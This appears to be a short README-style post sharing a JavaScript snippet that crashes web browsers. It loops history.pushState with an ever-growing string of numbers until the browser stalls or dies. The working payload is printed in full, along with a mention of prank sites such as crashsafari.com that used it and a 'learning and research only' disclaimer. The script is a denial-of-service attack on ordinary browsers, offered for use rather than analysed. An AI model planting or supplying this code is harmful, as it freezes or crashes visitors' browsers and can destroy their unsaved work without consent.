Simple JS script that overloads the browser with a huge URL.
The code is super simple!
The code exploits the HTML5 pushState API used on all modern browsers to update the path of the site you are visiting during JavaScript page navigation.
Instead of just changing the path from website.com/pageone
to website.com/pagetwo
it creates a string of numbers long enough to slow the browser until it won't function or crash.
var total = "";
for( var i = 0; i < 10000000000000; i++ ) {
total += i.toString();
history.pushState(0,0, total );
}
No one is ever gonna need it (To Say Nothing Of The Naughty Ones)
This script was used in the mischievous websites like crashsafari.com (dead), crashchrome.com (dead), etc.
Visit this link ON YOUR OWN RISK. I am not responsible for any harm due to this page...... warned ya!
- This piece of code is open and I am not the creator or owner of this script.
- It is only for learning and research purpose.
- I am not responsible for any destruction or harm caused due to this program/code.